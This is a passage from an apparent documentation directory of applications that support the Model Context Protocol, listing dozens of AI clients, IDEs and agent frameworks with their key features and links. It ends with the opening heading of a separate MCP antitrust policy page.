* **Rich User Experience**: Features beautifully formatted Markdown, blazing-fast text rendering, and intelligent, automated chat titling.
**Learn more:**
* [FlowDown website](https://flowdown.ai/)
* [FlowDown documentation](https://apps.qaq.wiki/docs/flowdown/)
Think n8n + ChatGPT. FLUJO is a desktop application that integrates with MCP to provide a workflow-builder interface for AI interactions. Built with Next.js and React, it supports both online and offline (ollama) models, it manages API Keys and environment variables centrally and can install MCP Servers from GitHub. FLUJO has a ChatCompletions endpoint and flows can be executed from other AI applications like Cline, Roo or Claude.
**Key features:**
* Environment & API Key Management
* Model Management
* MCP Server Integration
* Workflow Orchestration
* Chat Interface
Gemini CLI is an open-source AI agent that brings the power of Gemini directly into your terminal.
Programmatically assemble prompts for LLMs using GenAIScript (in JavaScript). Orchestrate LLMs, tools, and data in JavaScript.
**Key features:**
* JavaScript toolbox to work with prompts
* Abstraction to make it easy and productive
* Seamless Visual Studio Code integration
Genkit is a cross-language SDK for building and integrating GenAI features into applications. The [genkitx-mcp](https://github.com/firebase/genkit/tree/main/js/plugins/mcp) plugin enables consuming MCP servers as a client or creating MCP servers from Genkit tools and prompts.
**Key features:**
* Client support for tools and prompts (resources partially supported)
* Rich discovery with support in Genkit's Dev UI playground
* Seamless interoperability with Genkit's existing tools and prompts
* Works across a wide variety of GenAI models from top providers
Delegate tasks to GitHub Copilot coding agent and let it work in the background while you stay focused on the highest-impact and most interesting work
**Key features:**
* Delegate tasks to Copilot from GitHub Issues, Visual Studio Code, GitHub Copilot Chat or from your favorite MCP host using the GitHub MCP Server
* Tailor Copilot to your project by [customizing the agent's development environment](https://docs.github.com/en/enterprise-cloud@latest/copilot/how-tos/agents/copilot-coding-agent/customizing-the-development-environment-for-copilot-coding-agent#preinstalling-tools-or-dependencies-in-copilots-environment) or [writing custom instructions](https://docs.github.com/en/enterprise-cloud@latest/copilot/how-tos/agents/copilot-coding-agent/best-practices-for-using-copilot-to-work-on-tasks#adding-custom-instructions-to-your-repository)
* [Augment Copilot's context and capabilities with MCP tools](https://docs.github.com/en/enterprise-cloud@latest/copilot/how-tos/agents/copilot-coding-agent/extending-copilot-coding-agent-with-mcp), with support for both local and remote MCP servers
Glama is a comprehensive AI workspace and integration platform that offers a unified interface to leading LLM providers, including OpenAI, Anthropic, and others. It supports the Model Context Protocol (MCP) ecosystem, enabling developers and enterprises to easily discover, build, and manage MCP servers.
**Key features:**
* Integrated [MCP Server Directory](https://glama.ai/mcp/servers)
* Integrated [MCP Tool Directory](https://glama.ai/mcp/tools)
* Host MCP servers and access them via the Chat or SSE endpoints
– Ability to chat with multiple LLMs and MCP servers at once
* Upload and analyze local files and data
* Full-text search across all your chats and data
goose is an open source AI agent that supercharges your software development by automating coding tasks.
**Key features:**
* Expose MCP functionality to goose through tools.
* MCPs can be installed directly via the [extensions directory](https://block.github.io/goose/v1/extensions/), CLI, or UI.
* goose allows you to extend its functionality by [building your own MCP servers](https://block.github.io/goose/docs/tutorials/custom-extensions).
* Includes built-in extensions for development, memory, computer control, and auto-visualization.
gptme is a open-source terminal-based personal AI assistant/agent, designed to assist with programming tasks and general knowledge work.
**Key features:**
* CLI-first design with a focus on simplicity and ease of use
* Rich set of built-in tools for shell commands, Python execution, file operations, and web browsing
* Local-first approach with support for multiple LLM providers
* Open-source, built to be extensible and easy to modify
HyperAgent is Playwright supercharged with AI. With HyperAgent, you no longer need brittle scripts, just powerful natural language commands. Using MCP servers, you can extend the capability of HyperAgent, without having to write any code.
**Key features:**
* AI Commands: Simple APIs like page.ai(), page.extract() and executeTask() for any AI automation
* Fallback to Regular Playwright: Use regular Playwright when AI isn't needed
* Stealth Mode – Avoid detection with built-in anti-bot patches
* Cloud Ready – Instantly scale to hundreds of sessions via [Hyperbrowser](https://www.hyperbrowser.ai/)
* MCP Client – Connect to tools like Composio for full workflows (e.g. writing web data to Google Sheets)
Jenova is the best MCP client for non-technical users, especially on mobile.
**Key features:**
* 30+ pre-integrated MCP servers with one-click integration of custom servers
* MCP recommendation capability that suggests the best servers for specific tasks
* Multi-agent architecture with leading tool use reliability and scalability, supporting unlimited concurrent MCP server connections through RAG-powered server metadata
* Model agnostic platform supporting any leading LLMs (OpenAI, Anthropic, Google, etc.)
* Unlimited chat history and global persistent memory powered by RAG
* Easy creation of custom agents with custom models, instructions, knowledge bases, and MCP servers
* Local MCP server (STDIO) support coming soon with desktop apps
JetBrains AI Assistant plugin provides AI-powered features for software development available in all JetBrains IDEs.
**Key features:**
* Unlimited code completion powered by Mellum, JetBrains' proprietary AI model.
* Context-aware AI chat that understands your code and helps you in real time.
* Access to top-tier models from OpenAI, Anthropic, and Google.
* Offline mode with connected local LLMs via Ollama or LM Studio.
* Deep integration into IDE workflows, including code suggestions in the editor, VCS assistance, runtime error explanation, and more.
Junie is JetBrains' AI coding agent for JetBrains IDEs and Android Studio.
**Key features:**
* Connects to MCP servers over **stdio** to use external tools and data sources.
* Per-command approval with an optional allowlist.
* Config via `mcp.json` (global `~/.junie/mcp.json` or project `.junie/mcp/`).
Kilo Code is an autonomous coding AI dev team in VS Code that edits files, runs commands, uses a browser, and more.
**Key features:**
* Create and add tools through natural language (e.g. "add a tool that searches the web")
* Discover MCP servers via the MCP Marketplace
* One click MCP server installs via MCP Marketplace
* Displays configured MCP servers along with their tools, resources, and any error logs
Klavis AI is an Open-Source Infra to Use, Build & Scale MCPs with ease.
**Key features:**
* Slack/Discord/Web MCP clients for using MCPs directly
* Simple web UI dashboard for easy MCP configuration
* Direct OAuth integration with Slack & Discord Clients and MCP Servers for secure user authentication
* SSE transport support
**Learn more:**
* [Demo video showing MCP usage in Slack/Discord](https://youtu.be/9-QQAhrQWw8)
Langdock is the enterprise-ready solution for rolling out AI to all of your employees while enabling your developers to build and deploy custom AI workflows on top.
**Key features:**
* Remote MCP Server (SSE & Streamable HTTP) support, connect to any MCP server via OAuth, API Key, or without authentication.
* MCP Tool discovery and management, including tool confirmation UI.
* Enterprise-grade security and compliance features
Langflow is an open-source visual builder that lets developers rapidly prototype and build AI applications, it integrates with the Model Context Protocol (MCP) as both an MCP server and an MCP client.
**Key features:**
* Full support for using MCP server tools to build agents and flows.
* Export agents and flows as MCP server
* Local & remote server connections for enhanced privacy and security
**Learn more:**
* [Demo video showing how to use Langflow as both an MCP client & server](https://www.youtube.com/watch?v=pEjsaVVPjdI)
LibreChat is an open-source, customizable AI chat UI that supports multiple AI providers, now including MCP integration.
**Key features:**
* Extend current tool ecosystem, including [Code Interpreter](https://www.librechat.ai/docs/features/code_interpreter) and Image generation tools, through MCP servers
* Add tools to customizable [Agents](https://www.librechat.ai/docs/features/agents), using a variety of LLMs from top providers
* Open-source and self-hostable, with secure multi-user support
* Future roadmap includes expanded MCP feature support
LM Studio is a cross-platform desktop app for discovering, downloading, and running open-source LLMs locally. You can now connect local models to tools via Model Context Protocol (MCP).
**Key features:**
* Use MCP servers with local models on your computer. Add entries to `mcp.json` and save to get started.
* Tool confirmation UI: when a model calls a tool, you can confirm the call in the LM Studio app.
* Cross-platform: runs on macOS, Windows, and Linux, one-click installer with no need to fiddle in the command line
* Supports GGUF (llama.cpp) or MLX models with GPU acceleration
* GUI & terminal mode: use the LM Studio app or CLI (lms) for scripting and automation
**Learn more:**
* [Docs: Using MCP in LM Studio](https://lmstudio.ai/docs/app/plugins/mcp)
* [Create a 'Add to LM Studio' button for your server](https://lmstudio.ai/docs/app/plugins/mcp/deeplink)
* [Announcement blog: LM Studio + MCP](https://lmstudio.ai/blog/mcp)
LM-Kit.NET is a local-first Generative AI SDK for .NET (C# / VB.NET) that can act as an **MCP client**. Current MCP support: **Tools only**.
**Key features:**
* Consume MCP server tools over HTTP/JSON-RPC 2.0 (initialize, list tools, call tools).
* Programmatic tool discovery and invocation via `McpClient`.
* Easy integration in .NET agents and applications.
**Learn more:**
* [Docs: Using MCP in LM-Kit.NET](https://docs.lm-kit.com/lm-kit-net/api/LMKit.Mcp.Client.McpClient.html)
* [Creating AI agents](https://lm-kit.com/solutions/ai-agents)
* Product page: [LM-Kit.NET](https://lm-kit.com/products/lm-kit-net/)
Lutra is an AI agent that transforms conversations into actionable, automated workflows.
**Key features:**
* Easy MCP Integration: Connecting Lutra to MCP servers is as simple as providing the server URL; Lutra handles the rest behind the scenes.
* Chat to Take Action: Lutra understands your conversational context and goals, automatically integrating with your existing apps to perform tasks.
* Reusable Playbooks: After completing a task, save the steps as reusable, automated workflows—simplifying repeatable processes and reducing manual effort.
* Shareable Automations: Easily share your saved playbooks with teammates to standardize best practices and accelerate collaborative workflows.
**Learn more:**
* [Lutra AI agent explained (video)](https://www.youtube.com/watch?v=W5ZpN0cMY70)
MCP Bundler is perfect local proxy for your MCP workflow. The app centralizes all your MCP servers — toggle, group, turn off capabilities instantly. Switch bundles on the fly inside the MCP Bundler.
**Key features:**
* Unified Control Panel: Manage all your MCP servers — both Local STDIO and Remote HTTP/SSE — from one clear macOS window. Start, stop, or edit them instantly without touching configs.
* One Click, All Connected: Launch or disable entire MCP setups with one toggle. Switch bundles per project or workspace and keep your AI tools synced automatically.
* Per-Tool Control: Enable or hide individual tools inside each server. Keep your bundles clean, lightweight, and tailored for every AI workflow.
* Instant Health & Logs: Real-time health indicators and request logs show exactly what's running. Diagnose and fix connection issues without leaving the app.
* Auto-Generate MCP Config: Copy a ready-made JSON snippet for any client in seconds. No manual wiring — connect your Bundler as a single MCP endpoint.
**Learn more:**
* [MCP Bundler in action (video)](https://www.youtube.com/watch?v=CEHVSShw_NU)
MCPBundles provides MCPBundle Studio, a browser-based MCP client for testing and executing MCP tools on remote MCP servers.
**Key features:**
* Discover and inspect available tools with parameter schemas and descriptions
* Supports OAuth and API key authentication for secure provider connections
* Execute MCP tools with form-based and chat based input
* Implements MCP Apps for rendering interactive UI responses from tools
* Streamable HTTP transport for remote MCP server connections
mcp-agent is a simple, composable framework to build agents using Model Context Protocol.
**Key features:**
* Automatic connection management of MCP servers.
* Expose tools from multiple servers to an LLM.
* Implements every pattern defined in [Building Effective Agents](https://www.anthropic.com/research/building-effective-agents).
* Supports workflow pause/resume signals, such as waiting for human feedback.
mcp-client-chatbot is a local-first chatbot built with Vercel's Next.js, AI SDK, and Shadcn UI.
**Key features:**
* It supports standard MCP tool calling and includes both a custom MCP server and a standalone UI for testing MCP tools outside the chat flow.
* All MCP tools are provided to the LLM by default, but the project also includes an optional `@toolname` mention feature to make tool invocation more explicit—particularly useful when connecting to multiple MCP servers with many tools.
* Visual workflow builder that lets you create custom tools by chaining LLM nodes and MCP tools together. Published workflows become callable as `@workflow_name` tools in chat, enabling complex multi-step automation sequences.
mcp-use is an open source python library to very easily connect any LLM to any MCP server both locally and remotely.
**Key features:**
* Very simple interface to connect any LLM to any MCP.
* Support the creation of custom agents, workflows.
* Supports connection to multiple MCP servers simultaneously.
* Supports all langchain supported models, also locally.
* Offers efficient tool orchestration and search functionalities.
`mcpc` is a universal CLI client for MCP that maps MCP operations to intuitive commands for interactive shell use, scripts, and AI coding agents.
**Key features:**
* Swiss Army knife for MCP: supports stdio and streamable HTTP, server config files and zero config, OAuth 2.1, HTTP headers, and main MCP features.
* Persistent sessions for interaction with multiple servers simultaneously.
* Structured text output enables AI agents to explore and interact with MCP servers.
* JSON output and schema validation allow stable integration with other CLI tools, scripting, and MCP **code mode** in a shell.
* Proxy MCP server to provide AI code sandboxes with secure access to authenticated MCP sessions.
MCPHub is a powerful Neovim plugin that integrates MCP (Model Context Protocol) servers into your workflow.
**Key features:**
* Install, configure and manage MCP servers with an intuitive UI.
* Built-in Neovim MCP server with support for file operations (read, write, search, replace), command execution, terminal integration, LSP integration, buffers, and diagnostics.
* Create Lua-based MCP servers directly in Neovim.
* Inegrates with popular Neovim chat plugins Avante.nvim and CodeCompanion.nvim
MCPJam is an open source testing and debugging tool for MCP servers - Postman for MCP servers.
**Key features:**
* Test your MCP server's tools, resources, prompts, and OAuth. MCP spec compliant.
* LLM playground to test your server against different LLMs.
* Tracing and logging error messages.
* Connect and test multiple MCP servers simultaneously.
* Supports all transports - STDIO, SSE, and Streamable HTTP.
MCPOmni-Connect is a versatile command-line interface (CLI) client designed to connect to various Model Context Protocol (MCP) servers using both stdio and SSE transport.
**Key features:**
* Support for resources, prompts, tools, and sampling
* Agentic mode with ReAct and orchestrator capabilities
* Seamless integration with OpenAI models and other LLMs
* Dynamic tool and resource management across multiple servers
* Support for both stdio and SSE transport protocols
* Comprehensive tool orchestration and resource analysis capabilities
Memex is the first MCP client and MCP server builder - all-in-one desktop app. Unlike traditional MCP clients that only consume existing servers, Memex can create custom MCP servers from natural language prompts, immediately integrate them into its toolkit, and use them to solve problems—all within a single conversation.
**Key features:**
* **Prompt-to-MCP Server**: Generate fully functional MCP servers from natural language descriptions
* **Self-Testing & Debugging**: Autonomously test, debug, and improve created MCP servers
* **Universal MCP Client**: Works with any MCP server through intuitive, natural language integration
* **Curated MCP Directory**: Access to tested, one-click installable MCP servers (Neon, Netlify, GitHub, Context7, and more)
* **Multi-Server Orchestration**: Leverage multiple MCP servers simultaneously for complex workflows
**Learn more:**
* [Memex Launch 2: MCP Teams and Agent API](https://memex.tech/blog/memex-launch-2-mcp-teams-and-agent-api-private-preview-125f)
[Memgraph Lab](https://memgraph.com/lab) is a visualization and management tool for Memgraph graph databases. Its [GraphChat](https://memgraph.com/docs/memgraph-lab/features/graphchat) feature lets you query graph data using natural language, with MCP server integrations to extend your AI workflows.
**Key features:**
* Build GraphRAG workflows powered by knowledge graphs as the data backbone
* Connect remote MCP servers via `SSE` or `Streamable HTTP`
* Support for MCP tools, sampling, elicitation, and instructions
* Create multiple agents with different configurations for easy comparison and debugging
* Works with various LLM providers (OpenAI, Azure OpenAI, Anthropic, Gemini, Ollama, DeepSeek)
* Available as a Desktop app or Docker container
**Learn more:**
* [Memgraph Lab: MCP integration](https://memgraph.com/docs/memgraph-lab/features/graphchat#mcp-servers)
Microsoft Copilot Studio is a robust SaaS platform designed for building custom AI-driven applications and intelligent agents, empowering developers to create, deploy, and manage sophisticated AI solutions.
**Key features:**
* Support for MCP tools
* Extend Copilot Studio agents with MCP servers
* Leveraging Microsoft unified, governed, and secure API management solutions
MindPal is a no-code platform for building and running AI agents and multi-agent workflows for business processes.
**Key features:**
* Build custom AI agents with no-code
* Connect any SSE MCP server to extend agent tools
* Create multi-agent workflows for complex business processes
* User-friendly for both technical and non-technical professionals
* Ongoing development with continuous improvement of MCP support
**Learn more:**
* [MindPal MCP Documentation](https://docs.mindpal.io/agent/mcp)
Mistral AI: Le Chat is Mistral AI assistant with MCP support for remote servers and enterprise workflows.
**Key features:**
* Remote MCP server integration
* Enterprise-grade security
* Low-latency, high-throughput interactions with structured data
**Learn more:**
* [Mistral MCP Documentation](https://help.mistral.ai/en/collections/911943-connectors)
modelcontextchat.com is a web-based MCP client designed for working with remote MCP servers, featuring comprehensive authentication support and integration with OpenRouter.
**Key features:**
* Web-based interface for remote MCP server connections
* Header-based Authorization support for secure server access
* OAuth authentication integration
* OpenRouter API Key support for accessing various LLM providers
* No installation required - accessible from any web browser
MooPoint is a web-based AI chat platform built for developers and advanced users, letting you interact with multiple large language models (LLMs) through a single, unified interface. Connect your own API keys (OpenAI, Anthropic, and more) and securely manage custom MCP server integrations.
**Key features:**
* Accessible from any PC or smartphone—no installation required
* Choose your preferred LLM provider
* Supports `SSE`, `Streamable HTTP`, `npx`, and `uvx` MCP servers
* OAuth and sampling support
* New features added daily
Msty Studio is a privacy-first AI productivity platform that seamlessly integrates local and online language models (LLMs) into customizable workflows. Designed for both technical and non-technical users, Msty Studio offers a suite of tools to enhance AI interactions, automate tasks, and maintain full control over data and model behavior.
**Key features:**
* **Toolbox & Toolsets**: Connect AI models to local tools and scripts using MCP-compliant configurations. Group tools into Toolsets to enable dynamic, multi-step workflows within conversations.
* **Turnstiles**: Create automated, multi-step AI interactions, allowing for complex data processing and decision-making flows.
* **Real-Time Data Integration**: Enhance AI responses with up-to-date information by integrating real-time web search capabilities.
* **Split Chats & Branching**: Engage in parallel conversations with multiple models simultaneously, enabling comparative analysis and diverse perspectives.
**Learn more:**
* [Msty Studio Documentation](https://docs.msty.studio/features/toolbox/tools)
Needle is a RAG workflow platform that also works as an MCP client, letting you connect and use MCP servers in seconds.
**Key features:**
* **Instant MCP integration:** Connect any remote MCP server to your collection in seconds
* **Built-in RAG:** Automatically get retrieval-augmented generation out of the box
* **Secure OAuth:** Safe, token-based authorization when connecting to servers
* **Smart previews:** See what each MCP server can do and selectively enable the tools you need
**Learn more:**
* [Getting Started](https://docs.needle.app/docs/guides/hello-needle/getting-started/)
NVIDIA Agent Intelligence (AIQ) toolkit is a flexible, lightweight, and unifying library that allows you to easily connect existing enterprise agents to data sources and tools across any framework.
**Key features:**
* Acts as an MCP **client** to consume remote tools
* Acts as an MCP **server** to expose tools
* Framework agnostic and compatible with LangChain, CrewAI, Semantic Kernel, and custom agents
* Includes built-in observability and evaluation tools
**Learn more:**
* [AIQ toolkit MCP documentation](https://docs.nvidia.com/aiqtoolkit/latest/workflows/mcp/index.html)
OpenCode is an open source AI coding agent. It’s available as a terminal-based interface, desktop app, or IDE extension.
**Key features:**
* Support for MCP tools
* Support for MCP resources in the cli using `@` prefix
* Support for MCP prompts in the cli as slash commands using `/` prefix
OpenSumi is a framework helps you quickly build AI Native IDE products.
**Key features:**
* Supports MCP tools in OpenSumi
* Supports built-in IDE MCP servers and custom MCP servers
oterm is a terminal client for Ollama allowing users to create chats/agents.
**Key features:**
* Support for multiple fully customizable chat sessions with Ollama connected with tools.
* Support for MCP tools.
Postman is the most popular API client and now supports MCP server testing and debugging.
**Key features:**
* Full support of all major MCP features (tools, prompts, resources, and subscriptions)
* Fast, seamless UI for debugging MCP capabilities
* MCP config integration (Claude, VSCode, etc.) for fast first-time experience in testing MCPs
* Integration with history, variables, and collections for reuse and collaboration
RecurseChat is a powerful, fast, local-first chat client with MCP support. RecurseChat supports multiple AI providers including LLaMA.cpp, Ollama, and OpenAI, Anthropic.
**Key features:**
* Local AI: Support MCP with Ollama models.
* MCP Tools: Individual MCP server management. Easily visualize the connection states of MCP servers.
* MCP Import: Import configuration from Claude Desktop app or JSON
**Learn more:**
* [RecurseChat docs](https://recurse.chat/docs/features/mcp/)
Replit Agent is an AI-powered software development tool that builds and deploys applications through natural language. It supports MCP integration, enabling users to extend the agent's capabilities with custom tools and data sources.
**Learn more:**
* [Replit MCP Documentation](https://docs.replit.com/replitai/mcp/overview)
* [MCP Install Links](https://docs.replit.com/replitai/mcp/install-links)
Roo Code enables AI coding assistance via MCP.
**Key features:**
* Support for MCP tools and resources
* Integration with development workflows
* Extensible AI capabilities
[rtrvr.ai](https://rtrvr.ai) is AI Web Agent Chrome Extension that autonomously runs complex browser workflows, retrieves data to Sheets, and calls API's/MCP Servers – all with just prompting and within your own browser!
**Key features:**
* Easy MCP Integration within your browser: Just open the Chrome Extension, add the server URL, and prompt server calls with the web as context!
* Remote control your browser by turning your browser into MCP Server: Just copy/paste MCP URL into any MCP Client (no npx needed), and trigger agentic browser workflows!
* Prompt our agent to execute workflows combining web agentic actions with MCP tool calls; find someone's email on the web and then send them an email with Zapier MCP.
* Reusable and Schedulable Automations: After running a workflow, easily rerun or put on a schedule to execute in the background while you do other tasks in your browser.
Shortwave is an AI-powered email client that supports MCP tools to enhance email productivity and workflow automation.
**Key features:**
* MCP tool integration for enhanced email workflows
* Rich UI for adding, managing and interacting with a wide range of MCP servers
* Support for both remote (Streamable HTTP and SSE) and local (Stdio) MCP servers
* AI assistance for managing your emails, calendar, tasks and other third-party services
Simtheory is an agentic AI workspace that unifies multiple AI models, tools, and capabilities under a single subscription. It provides comprehensive MCP support through its MCP Store, allowing users to extend their workspace with productivity tools and integrations.
**Key features:**
* **MCP Store**: Marketplace for productivity tools and MCP server integrations
* **Parallel Tasking**: Run multiple AI tasks simultaneously with MCP tool support
* **Model Catalogue**: Access to frontier models with MCP tool integration
* **Hosted MCP Servers**: Plug-and-play MCP integrations with no technical setup
* **Advanced MCPs**: Specialized tools like Tripo3D (3D creation), Podcast Maker, and Video Maker
* **Enterprise Ready**: Flexible workspaces with granular access control for MCP tools
**Learn more:**
* [Simtheory website](https://simtheory.ai)
Slack MCP Client acts as a bridge between Slack and Model Context Protocol (MCP) servers. Using Slack as the interface, it enables large language models (LLMs) to connect and interact with various MCP servers through standardized MCP tools.
**Key features:**
* **Supports Popular LLM Providers:** Integrates seamlessly with leading large language model providers such as OpenAI, Anthropic, and Ollama, allowing users to leverage advanced conversational AI and orchestration capabilities within Slack.
* **Dynamic and Secure Integration:** Supports dynamic registration of MCP tools, works in both channels and direct messages and manages credentials securely via environment variables or Kubernetes secrets.
* **Easy Deployment and Extensibility:** Offers official Docker images, a Helm chart for Kubernetes, and Docker Compose for local development, making it simple to deploy, configure, and extend with additional MCP servers or tools.
Smithery Playground is a developer-first MCP client for exploring, testing and debugging MCP servers against LLMs. It provides detailed traces of MCP RPCs to help troubleshoot implementation issues.
**Key features:**
* One-click connect to MCP servers via URL or from Smithery's registry
* Develop MCP servers that are running on localhost
* Inspect tools, prompts, resources, and sampling configurations with live previews
* Run conversational or raw tool calls to verify MCP behavior before shipping
* Full OAuth MCP-spec support
SpinAI is an open-source TypeScript framework for building observable AI agents. The framework provides native MCP compatibility, allowing agents to seamlessly integrate with MCP servers and tools.
**Key features:**
* Built-in MCP compatibility for AI agents
* Open-source TypeScript framework
* Observable agent architecture
* Native support for MCP tools integration
Superinterface is AI infrastructure and a developer platform to build in-app AI assistants with support for MCP, interactive components, client-side function calling and more.
**Key features:**
* Use tools from MCP servers in assistants embedded via React components or script tags
* SSE transport support
* Use any AI model from any AI provider (OpenAI, Anthropic, Ollama, others)
Superjoin brings the power of MCP directly into Google Sheets extension. With Superjoin, users can access and invoke MCP tools and agents without leaving their spreadsheets, enabling powerful AI workflows and automation right where their data lives.
**Key features:**
* Native Google Sheets add-on providing effortless access to MCP capabilities
* Supports OAuth 2.1 and header-based authentication for secure and flexible connections
* Compatible with both SSE and Streamable HTTP transport for efficient, real-time streaming communication
* Fully web-based, cross-platform client requiring no additional software installation
Swarms is a production-grade multi-agent orchestration framework that supports MCP integration for dynamic tool discovery and execution.
**Key features:**
* Connects to MCP servers via SSE transport for real-time tool integration
* Automatic tool discovery and loading from MCP servers
* Support for distributed tool functionality across multiple agents
* Enterprise-ready with high availability and observability features
* Modular architecture supporting multiple AI model providers
**Learn more:**
* [Swarms MCP Integration Documentation](https://docs.swarms.world/en/latest/swarms/tools/tools_examples/)
systemprompt is a voice-controlled mobile app that manages your MCP servers. Securely leverage MCP agents from your pocket. Available on iOS and Android.
**Key features:**
* **Native Mobile Experience**: Access and manage your MCP servers anytime, anywhere on both Android and iOS devices
* **Advanced AI-Powered Voice Recognition**: Sophisticated voice recognition engine enhanced with cutting-edge AI and Natural Language Processing (NLP), specifically tuned to understand complex developer terminology and command structures
* **Unified Multi-MCP Server Management**: Effortlessly manage and interact with multiple Model Context Protocol (MCP) servers from a single, centralized mobile application
Tambo is a platform for building custom chat experiences in React, with integrated custom user interface components.
**Key features:**
* Hosted platform with React SDK for integrating chat or other LLM-based experiences into your own app.
* Support for selection of arbitrary React components in the chat experience, with state management and tool calling.
* Support for MCP servers, from Tambo's servers or directly from the browser.
* Supports OAuth 2.1 and custom header-based authentication.
* Support for MCP tools and sampling, with additional MCP features coming soon.
Tencent CloudBase AI DevKit is a tool for building AI agents in minutes, featuring zero-code tools, secure data integration, and extensible plugins via MCP.
**Key features:**
* Support for MCP tools
* Extend agents with MCP servers
* MCP servers hosting: serverless hosting and authentication support
Theia AI is a framework for building AI-enhanced tools and IDEs. The [AI-powered Theia IDE](https://eclipsesource.com/blogs/2024/10/08/introducting-ai-theia-ide/) is an open and flexible development environment built on Theia AI.
**Key features:**
* **Tool Integration**: Theia AI enables AI agents, including those in the Theia IDE, to utilize MCP servers for seamless tool interaction.
* **Customizable Prompts**: The Theia IDE allows users to define and adapt prompts, dynamically integrating MCP servers for tailored workflows.
* **Custom agents**: The Theia IDE supports creating custom agents that leverage MCP capabilities, enabling users to design dedicated workflows on the fly.
Theia AI and Theia IDE's MCP integration provide users with flexibility, making them powerful platforms for exploring and adapting MCP.
**Learn more:**
* [Theia IDE and Theia AI MCP Announcement](https://eclipsesource.com/blogs/2024/12/19/theia-ide-and-theia-ai-support-mcp/)
* [Download the AI-powered Theia IDE](https://theia-ide.org/)
Tome is an open source cross-platform desktop app designed for working with local LLMs and MCP servers. It is designed to be beginner friendly and abstract away the nitty gritty of configuration for people getting started with MCP.
**Key features:**
* MCP servers are managed by Tome so there is no need to install uv or npm or configure JSON
* Users can quickly add or remove MCP servers via UI
* Any tool-supported local model on Ollama is compatible
TypingMind is an advanced frontend for LLMs with MCP support. TypingMind supports all popular LLM providers like OpenAI, Gemini, Claude, and users can use with their own API keys.
**Key features:**
* **MCP Tool Integration**: Once MCP is configured, MCP tools will show up as plugins that can be enabled/disabled easily via the main app interface.
* **Assign MCP Tools to Agents**: TypingMind allows users to create AI agents that have a set of MCP servers assigned.
* **Remote MCP servers**: Allows users to customize where to run the MCP servers via its MCP Connector configuration, allowing the use of MCP tools across multiple devices (laptop, mobile devices, etc.) or control MCP servers from a remote private server.
**Learn more:**
* [TypingMind MCP Document](https://www.typingmind.com/mcp)
* [Download TypingMind (PWA)](https://www.typingmind.com/)
v0 turns your ideas into fullstack apps, no code required. Describe what you want with natural language, and v0 builds it for you. v0 can search the web, inspect sites, automatically fix errors, and integrate with external tools.
**Key features:**
* **Visual to Code**: Create high-fidelity UIs from your wireframes or mockups
* **One-Click Deploy**: Deploy with one click to a secure, scalable infrastructure
* **Web Search**: Search the web for current information and get cited results
* **Site Inspector**: Inspect websites to understand their structure and content
* **Auto Error Fixing**: Automatically fix errors in your code with intelligent diagnostics
* **MCP Integrations**: Connect to MCP servers from the Vercel Marketplace for zero-config setup, or add your own custom MCP servers
**Learn more:**
* [v0 Website](https://v0.app)
VS Code integrates MCP with GitHub Copilot through [agent mode](https://code.visualstudio.com/docs/copilot/chat/chat-agent-mode), allowing direct interaction with MCP-provided tools within your agentic coding workflow. Configure servers in Claude Desktop, workspace or user settings, with guided MCP installation and secure handling of keys in input variables to avoid leaking hard-coded keys.
**Key features:**
* Support for stdio and server-sent events (SSE) transport
* Per-session selection of tools per agent session for optimal performance
* Easy server debugging with restart commands and output logging
* Tool calls with editable inputs and always-allow toggle
* Integration with existing VS Code extension system to register MCP servers from extensions
VT Code is a terminal coding agent that integrates with Model Context Protocol (MCP) servers, focusing on predictable tool permissions and robust transport controls.
**Key features:**
* Connect to MCP servers over stdio; optional experimental RMCP/streamable HTTP support
* Configurable per-provider concurrency, startup/tool timeouts, and retries via `vtcode.toml`
* Pattern-based allowlists for tools, resources, and prompts with provider-level overrides
**Learn more:**
* [MCP Integration Guide](https://github.com/vinhnx/vtcode/blob/main/docs/guides/mcp-integration.md)
Warp is the intelligent terminal with AI and your dev team's knowledge built-in. With natural language capabilities integrated directly into an agentic command line, Warp enables developers to code, automate, and collaborate more efficiently -- all within a terminal that features a modern UX.
**Key features:**
* **Agent Mode with MCP support**: invoke tools and access data from MCP servers using natural language prompts
* **Flexible server management**: add and manage CLI or SSE-based MCP servers via Warp's built-in UI
* **Live tool/resource discovery**: view tools and resources from each running MCP server
* **Configurable startup**: set MCP servers to start automatically with Warp or launch them manually as needed
WhatsMCP is an MCP client for WhatsApp. WhatsMCP lets you interact with your AI stack from the comfort of a WhatsApp chat.
**Key features:**
* Supports MCP tools
* SSE transport, full OAuth2 support
* Chat flow management for WhatsApp messages
* One click setup for connecting to your MCP servers
* In chat management of MCP servers
* Oauth flow natively supported in WhatsApp
Windsurf Editor is an agentic IDE that combines AI assistance with developer workflows. It features an innovative AI Flow system that enables both collaborative and independent AI interactions while maintaining developer control.
**Key features:**
* Revolutionary AI Flow paradigm for human-AI collaboration
* Intelligent code generation and understanding
* Rich development tools with multi-model support
Witsy is an AI desktop assistant, supporting Anthropic models and MCP servers as LLM tools.
**Key features:**
* Multiple MCP servers support
* Tool integration for executing commands and scripts
* Local server connections for enhanced privacy and security
* Easy-install from Smithery.ai
* Open-source, available for macOS, Windows and Linux
Zed is a high-performance code editor with built-in MCP support, focusing on prompt templates and tool integration.
**Key features:**
* Prompt templates surface as slash commands in the editor
* Tool integration for enhanced coding workflows
* Tight integration with editor features and workspace context
* Does not support MCP resources
Zencoder is a coding agent that's available as an extension for VS Code and JetBrains family of IDEs, meeting developers where they already work. It comes with RepoGrokking (deep contextual codebase understanding), agentic pipeline, and the ability to create and share custom agents.
**Key features:**
* RepoGrokking - deep contextual understanding of codebases
* Agentic pipeline - runs, tests, and executes code before outputting it
* Zen Agents platform - ability to build and create custom agents and share with the team
* Integrated MCP tool library with one-click installations
* Specialized agents for Unit and E2E Testing
**Learn more:**
* [Zencoder Documentation](https://docs.zencoder.ai)
## Adding MCP support to your application
If you've added MCP support to your application, we encourage you to submit a pull request to add it to this list. MCP integration can provide your users with powerful contextual AI capabilities and make your application part of the growing MCP ecosystem.
Benefits of adding MCP support:
* Enable users to bring their own context and tools
* Join a growing ecosystem of interoperable AI applications
* Provide users with flexible integration options
* Support local-first AI workflows
To get started with implementing MCP in your application, check out our [Python](https://github.com/modelcontextprotocol/python-sdk) or [TypeScript SDK Documentation](https://github.com/modelcontextprotocol/typescript-sdk)
# Antitrust Policy
Source: https://modelcontextprotocol.io/community/antitrust
MCP Project Antitrust Policy for participants and contributors
**Effective: September 29, 2025**
## Introduction
